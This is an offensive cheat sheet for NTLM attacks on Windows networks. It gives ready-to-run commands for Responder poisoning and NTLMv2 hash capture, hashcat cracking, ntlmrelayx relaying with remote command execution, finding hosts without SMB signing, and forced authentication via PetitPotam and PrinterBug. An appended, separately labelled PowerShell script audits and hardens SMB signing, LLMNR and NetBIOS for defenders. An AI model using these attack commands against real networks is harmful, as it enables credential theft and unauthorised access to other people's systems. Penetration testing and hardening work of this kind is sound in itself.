NTLM Relay & Responder

Capture hashes with Responder
Poison LLMNR/NBT-NS/mDNS — Capture NTLMv2 hashes on the network

    sudo responder -I eth0 -dwPv

Example output:

    [SMB] NTLMv2-SSP Client   : 10.10.10.50
    [SMB] NTLMv2-SSP Username : DOMAIN\jsmith
    [SMB] NTLMv2-SSP Hash     : jsmith::DOMAIN:1122334455667788:ABC123...

Crack captured NTLMv2 hashes
Hashcat mode 5600

    hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

NTLM relay with ntlmrelayx
Relay captured auth to another host — Don't crack, relay instead

    # Disable SMB and HTTP in /etc/responder/Responder.conf
    # SMB = Off, HTTP = Off
    impacket-ntlmrelayx -tf targets.txt -smb2support
    # Or execute command:
    impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"

Find hosts without SMB signing
Required for relay attacks — These are valid relay targets

    crackmapexec smb $SUBNET/24 --gen-relay-list relay_targets.txt
    # "Message signing enabled but not required" = relay target

Force authentication (coercion)
Trigger authentication to your Responder

    # PetitPotam (unauthenticated):
    python3 PetitPotam.py $LHOST $DC_IP
    # PrinterBug / SpoolSample:
    python3 printerbug.py domain/user:password@$TARGET $LHOST
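The defender-side counterpart, added here and not part of the original cheat sheet: a PowerShell script that audits a Windows host for the three conditions the tools above depend on (SMB signing enabled but not required, LLMNR on, NBT-NS on) and hardens them when run with -Fix. It assumes an elevated session on Windows 8 / Server 2012 or later; the cmdlets, WMI class and registry path are standard Windows ones.

```powershell
# Added example, not part of the original cheat sheet.
# Audit (and with -Fix, harden) the settings that make a host poisonable/relayable.
# Assumes an elevated PowerShell session on Windows 8 / Server 2012 or later.
param([switch]$Fix)

$llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'

function Get-Finding([string]$Check, $Value, [bool]$Safe) {
    [pscustomobject]@{
        Check  = $Check
        Value  = $Value
        Status = if ($Safe) { 'OK' } else { 'EXPOSED' }
    }
}

# SMB signing: "enabled but not required" is exactly what --gen-relay-list flags.
$srv = Get-SmbServerConfiguration
$cli = Get-SmbClientConfiguration
Get-Finding 'SMB server RequireSecuritySignature' $srv.RequireSecuritySignature $srv.RequireSecuritySignature
Get-Finding 'SMB client RequireSecuritySignature' $cli.RequireSecuritySignature $cli.RequireSecuritySignature

# LLMNR: EnableMulticast = 0 under the DNSClient policy key turns it off.
$llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
Get-Finding 'LLMNR EnableMulticast (0 = off)' $llmnr ($llmnr -eq 0)

# NBT-NS: TcpipNetbiosOptions = 2 disables NetBIOS over TCP/IP, per adapter.
$adapters = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
foreach ($a in $adapters) {
    Get-Finding "NetBIOS over TCP/IP on $($a.Description) (2 = off)" $a.TcpipNetbiosOptions ($a.TcpipNetbiosOptions -eq 2)
}

if ($Fix) {
    # Require signing on both sides so a relayed session cannot be used unsigned.
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force

    # Disable LLMNR via the policy key (same key Group Policy writes).
    New-Item -Path $llmnrKey -Force | Out-Null
    Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord

    # Disable NetBIOS over TCP/IP on every IP-enabled adapter.
    foreach ($a in $adapters) {
        Invoke-CimMethod -InputObject $a -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = 2 } | Out-Null
    }
    Write-Host 'Hardening applied; re-run without -Fix to verify, then confirm from the network with --gen-relay-list.'
}
```

Run the audit first and review which adapters and shares are affected; requiring signing everywhere can break very old clients, so roll it out through Group Policy once the audit shows what still depends on unsigned SMB.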